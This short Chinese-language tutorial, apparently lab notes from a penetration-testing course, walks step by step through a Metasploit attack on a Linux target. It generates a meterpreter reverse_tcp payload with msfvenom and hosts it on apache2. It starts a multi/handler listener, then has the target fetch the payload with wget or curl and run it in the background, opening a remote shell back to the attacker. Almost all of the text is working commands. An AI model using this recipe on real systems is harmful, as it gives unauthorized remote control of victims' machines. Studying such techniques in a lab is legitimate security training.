需要
1.生成payload 木马
2.开启httpd
3.启动msfdb run 监听
4.目标机下载payload 并执行
5.
6.
开始
1: 生成payload 木马 把他存放到httpd服务的 /var/www/html/下
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.55 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost
参数说明
-p 选择一个模块吧。
-b 在生成的程序中避免出现的值
-f 生成的文件格式
-o payload存放目录
-h 帮助
2.开启httpd 让目标机下载我的payload病毒
systemctl start apache2
参数说明
-p 选择一个模块吧。
-b 在生成的程序中避免出现的值
-f 生成的文件格式
-o payload存放目录
-h 帮助
3.启动msfdb run 监听 加载 1里面生成的payload :linux/x64/meterpreter/reverse_tcp
msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.55
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > run
参数说明
4.目标机下载payload
第一种下载方式
wget http://192.168.0.55/xuegod-ghost
第二种下载方式
curl http://192.168.0.55/xuegod-ghost -o xuegod-ghost
在目标机后台执行payload
chmod 777 xuegod-ghost
./xuegod-ghost &
参数说明
&: 后台执行
目标机运行 payload kali就获取到了
--------------其他参数--------------
可以查看xuegod文件的进程情况
ps -aux|grep xuegod
ps -aux : 查看全部文件进程
grep xuegod : 筛选xuegod文件
杀死进程
kill -9 id
-9 :杀进程